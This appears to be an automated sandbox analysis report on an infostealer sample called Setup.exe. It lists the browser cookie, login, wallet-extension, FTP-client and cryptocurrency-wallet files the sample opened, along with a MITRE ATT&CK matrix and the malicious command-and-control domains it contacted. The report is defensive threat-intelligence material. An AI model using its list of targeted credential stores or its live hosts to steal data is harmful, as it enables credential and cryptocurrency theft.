              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\BPMLNOBVSB
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\FENIVHOIKN
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\NWTVCDUMOB
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\WUTJSCBCFX
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\UMMBDNEQBN
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: number of queries: 1001
Source: Yara match; File source: 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Setup.exe PID: 6984, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match; File source: Process Memory Space: Setup.exe PID: 6984, type: MEMORYSTR
Source: Yara match; File source: sslproxydump.pcap, type: PCAP
Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK matrix, listed per tactic (the numbers in brackets are the ones shown next to a technique in the report's matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (12); PowerShell (1); At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (21); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); DLL Side-Loading (1); Software Packing; Steganography
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Query Registry (1); Security Software Discovery (221); Virtualization/Sandbox Evasion (21); Process Discovery (1); File and Directory Discovery (2); System Information Discovery (22)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
Setup.exe | 9% | Virustotal |
Setup.exe | 11% | ReversingLabs |
No Antivirus matches
Source | Detection | Scanner | Label
https://locketsashayz.click/0000Z0o | 0% | Avira URL Cloud | safe
https://locketsashayz.click/op | 0% | Avira URL Cloud | safe
https://locketsashayz.click/pi | 0% | Avira URL Cloud | safe
https://locketsashayz.click:443/api | 0% | Avira URL Cloud | safe
https://locketsashayz.click/s | 0% | Avira URL Cloud | safe
https://locketsashayz.click/M | 0% | Avira URL Cloud | safe
https://cegu.shop/ | 100% | Avira URL Cloud | malware
https://locketsashayz.click/api.I | 0% | Avira URL Cloud | safe
https://locketsashayz.click/api9H | 0% | Avira URL Cloud | safe
https://locketsashayz.click/pijH | 0% | Avira URL Cloud | safe
https://cegu.shop/8574262446/ph.txtks | 100% | Avira URL Cloud | malware
https://locketsashayz.click/ | 0% | Avira URL Cloud | safe
https://locketsashayz.click/H | 0% | Avira URL Cloud | safe
https://locketsashayz.click/lao | 0% | Avira URL Cloud | safe
https://locketsashayz.click/apil | 0% | Avira URL Cloud | safe
https://locketsashayz.click/api | 0% | Avira URL Cloud | safe
https://cegu.shop/Q | 100% | Avira URL Cloud | malware
https://locketsashayz.click/0R | 0% | Avira URL Cloud | safe
https://klipvumisui.shop/int_clp_sha.txt)E | 100% | Avira URL Cloud | malware
https://cegu.shop/I | 100% | Avira URL Cloud | malware
https://locketsashayz.click/apiV | 0% | Avira URL Cloud | safe
https://locketsashayz.click/apiU | 0% | Avira URL Cloud | safe
locketsashayz.click | 0% | Avira URL Cloud | safe
https://locketsashayz.click/apiR | 0% | Avira URL Cloud | safe
https://cegu.shop/5 | 100% | Avira URL Cloud | malware
https://locketsashayz.click/bu9 | 0% | Avira URL Cloud | safe
https://locketsashayz.click/bu | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
cegu.shop | 185.161.251.21 | true | false |  | high
locketsashayz.click | 188.114.97.3 | true | true |  | unknown
Name | Malicious | Antivirus Detection | Reputation
https://locketsashayz.click/api | true | Avira URL Cloud: safe | unknown
rabidcowse.shop | false |  | high
wholersorie.shop | false |  | high
cloudewahsj.shop | false |  | high
noisycuttej.shop | false |  | high
nearycrepso.shop | false |  | high
https://cegu.shop/8574262446/ph.txt | false |  | high
locketsashayz.click | true | Avira URL Cloud: safe | unknown
framekgirus.shop | false |  | high
tirepublicerj.shop | false |  | high
abruptyopsn.shop | false |  | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://locketsashayz.click/0000Z0o | Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://locketsashayz.click/s | Setup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959070741.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944632767.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://locketsashayz.click/pijH | Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://locketsashayz.click:443/api | Setup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://locketsashayz.click/op | Setup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959070741.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944632767.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cegu.shop/ | Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://dfgh.online/invoker.php?compName= | Setup.exe, 00000000.00000002.4139812014.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4140538030.000000000413A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605662760.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139549503.0000000001438000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139721982.0000000001470000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://locketsashayz.click/api9H | Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | Setup.exe, 00000000.00000003.1844311579.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1844628829.0000000004176000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855827398.0000000004176000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855995799.0000000004176000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://locketsashayz.click/pi | Setup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959070741.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944632767.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://locketsashayz.click/api.I | Setup.exe, 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://x1.c.lencr.org/0 | Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://x1.i.lencr.org/0 | Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmp | false |  | high
